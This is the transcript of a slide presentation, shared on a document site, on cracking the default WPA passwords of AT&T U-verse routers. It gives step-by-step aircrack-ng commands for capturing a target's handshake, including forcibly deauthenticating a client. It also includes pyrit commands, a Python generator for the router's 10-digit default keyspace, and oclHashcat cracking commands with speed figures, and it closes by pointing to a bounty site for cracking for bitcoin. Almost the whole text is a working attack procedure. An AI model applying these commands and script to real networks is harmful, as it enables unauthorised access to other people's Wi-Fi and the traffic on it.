cracking at&t u-verse default wpa1/2 passwords

25
Cracking AT&T U-verse Default WPA1/2 Passwords. by Jason Wheeler Awesome blog: http://blog.init6.me E

Upload: amma

Post on 25-Feb-2016

75 views

Category:

Documents


0 download

DESCRIPTION

Cracking AT&T U-verse Default WPA1/2 Passwords. . by Jason Wheeler Awesome blog: http://blog.init6.me E. Getting the Handshake. Aircrack's site has a pretty good tutorial. Boot from Back Track 5 R3 - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: Cracking AT&T U-verse Default WPA1/2 Passwords

Cracking AT&T U-verse Default WPA1/2 Passwords.

by Jason WheelerAwesome blog: http://blog.init6.meE

Page 2: Cracking AT&T U-verse Default WPA1/2 Passwords

Getting the Handshake

Page 3: Cracking AT&T U-verse Default WPA1/2 Passwords

Aircrack's site has a pretty good tutorial.

Boot from Back Track 5 R3

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0

#airodump-ng --encrypt wpa mon0

Page 4: Cracking AT&T U-verse Default WPA1/2 Passwords
Page 5: Cracking AT&T U-verse Default WPA1/2 Passwords

#airmon-zc stop mon0

Start airmon-zc on the channel of the target.

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wpa --write <FILENAME> --output-format pcap -a --channel <Channel number>

Page 6: Cracking AT&T U-verse Default WPA1/2 Passwords

Deauthenticate a client#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

Where:• -0 means deauthentication• 5 is the number of deauths to send• -a 00:14:6C:7E:40:80 is the MAC address of the access point• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are

deauthing• mon0 is the interface name

Page 7: Cracking AT&T U-verse Default WPA1/2 Passwords

WPA Handshake

Page 8: Cracking AT&T U-verse Default WPA1/2 Passwords

Verify 4-way Handshake

Page 9: Cracking AT&T U-verse Default WPA1/2 Passwords
Page 10: Cracking AT&T U-verse Default WPA1/2 Passwords

PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake.

Page 11: Cracking AT&T U-verse Default WPA1/2 Passwords
Page 12: Cracking AT&T U-verse Default WPA1/2 Passwords
Page 13: Cracking AT&T U-verse Default WPA1/2 Passwords
Page 14: Cracking AT&T U-verse Default WPA1/2 Passwords
Page 15: Cracking AT&T U-verse Default WPA1/2 Passwords
Page 16: Cracking AT&T U-verse Default WPA1/2 Passwords

Verify 4-way Handshake

The easy way......

#pyrit -r <FILENAME>.pcap analyze

Page 17: Cracking AT&T U-verse Default WPA1/2 Passwords
Page 18: Cracking AT&T U-verse Default WPA1/2 Passwords
Page 19: Cracking AT&T U-verse Default WPA1/2 Passwords

Strip out the junk.

#pyrit -r <FILENAME>.pcap -o OUTPUT.pcap strip

Page 20: Cracking AT&T U-verse Default WPA1/2 Passwords

CAP-2-HCCAPTo turn your pcap file into a hashcat-plus friendly file you can upload it

to https://hashcat.net/cap2hccap/

Page 21: Cracking AT&T U-verse Default WPA1/2 Passwords

CRACK!!

Page 22: Cracking AT&T U-verse Default WPA1/2 Passwords

Python Scriptimport sys

MAX_INT = 9999999999BAD_PATTERNS = {x * 3 for x in '0123456789'}

for number in xrange(MAX_INT): int_string = str(number).rjust(10, '0') if any(pattern in int_string for pattern in BAD_PATTERNS): continue print ( int_string )

Page 23: Cracking AT&T U-verse Default WPA1/2 Passwords

Hashcat-plus$python 2wire.py | ./oclhashcat-plus64.bin -m 2500 -a 0

<filename>.hccap --gpu-accel=160 --gpu-loops=1024

88,770 c/s real or

$./oclhashcat-plus64.bin -m 2500 -a 3 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 -1?d ?1?1?1?1?1?1?1?1?1?1

114K c/s real

Page 24: Cracking AT&T U-verse Default WPA1/2 Passwords

Crack for Bitcoin.http://www.hashbounty.net/bounties